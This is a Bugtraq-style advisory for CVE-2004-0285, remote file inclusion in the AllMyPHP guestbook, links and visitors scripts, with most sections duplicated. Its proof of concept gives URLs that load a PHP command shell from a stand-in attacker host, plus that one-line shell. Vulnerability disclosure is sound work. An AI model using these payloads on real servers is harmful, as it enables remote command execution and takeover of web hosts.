Voice Of Web AllMyPHP Remote File Include Vulnerabilities
BID:9664
Info
Voice Of Web AllMyPHP Remote File Include Vulnerabilities
| Bugtraq ID: | 9664 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0285 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2004 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Disclosure of these issues has been credited to Pablo Santana <[email protected]>. |
| Vulnerable: |
Voice Of Web AllMyVisitors 0.4 Voice Of Web AllMyVisitors 0.3 Voice Of Web AllMyLinks 0.5 Voice Of Web AllMyLinks 0.4.9 Voice Of Web AllMyLinks 0.4.4 Voice Of Web AllMyLinks 0.4.3 Voice Of Web AllMyLinks 0.4.1 Voice Of Web AllMyLinks 0.4 Voice Of Web AllMyLinks 0.3 Voice Of Web AllMyGuests 0.4.1 Voice Of Web AllMyGuests 0.4 Voice Of Web AllMyGuests 0.3 Voice Of Web AllMyGuests 0.1.2 |
| Not Vulnerable: | |
Discussion
Voice Of Web AllMyPHP Remote File Include Vulnerabilities
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
Exploit / POC
Voice Of Web AllMyPHP Remote File Include Vulnerabilities
There is no exploit required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
http://www.example.com/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
http://www.example.com/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
In all cases 'www.example.org/attacker.php' will contain:
<?php
system("$cmd");
?>
There is no exploit required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
http://www.example.com/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
http://www.example.com/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
In all cases 'www.example.org/attacker.php' will contain:
<?php
system("$cmd");
?>
Solution / Fix
Voice Of Web AllMyPHP Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Voice Of Web AllMyPHP Remote File Include Vulnerabilities
References:
References:
- AllMyPHP Product Page (Voice Of Web)
- AllMyGuests PHP Code Injection vulnerability (Pablo Santana
- AllMyLinks PHP Code Injection vulnerability (Pablo Santana
- AllMyVisitors PHP Code Injection vulnerability (Pablo Santana